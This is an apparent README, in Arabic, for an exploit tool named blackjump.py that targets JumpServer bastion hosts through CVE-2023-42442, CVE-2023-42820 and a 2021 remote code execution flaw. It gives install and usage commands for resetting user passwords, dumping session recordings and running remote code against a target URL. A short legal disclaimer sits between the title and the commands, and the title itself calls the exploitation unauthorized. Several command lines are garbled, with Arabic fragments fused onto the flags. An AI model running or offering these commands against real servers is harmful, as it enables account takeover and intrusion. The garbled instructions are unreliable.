
استغلال شامل غير مصرح به لثغرات خادم الحصن JumpServer، استغلال لـ CVE-2023-42442 / CVE-2023-42820 / RCE 2021
إخلاء مسؤولية: هذه الأداة مخصصة فقط لأنشطة بناء الأمان المؤسسي المصرح بها قانونيًا. عند استخدام هذه الأداة للاختبار، يجب عليك التأكد من أن هذا النشاط يتوافق مع القوانين واللوائح المحلية، وأنك حصلت على التفويض الكافي. لا تستخدمها ضد أهداف غير مصرح بها.
إذا قمت بأي سلوك غير قانوني أثناء استخدام هذه الأداة، فسوف تتحمل العواقب المقابلة بنفسك، ولن نتحمل أي مسؤولية قانونية أو مسؤولية تضامنية.
استغلال شامل لثغرات خادم الحصن JumpServer
python3 -m pip install -r requirements.txt
--user و --emailpython3 blackjump.py reset https://vulerability

<uuid4>.tar الموجود في دليل output/ في مشغّل Jumpserver لتشغيلهpython3 blackjump.py dump https://vulerability
e
python3 blackjump.py rce http(s)://vulerability

python3 blackjump.py {reset,dump,rce} -h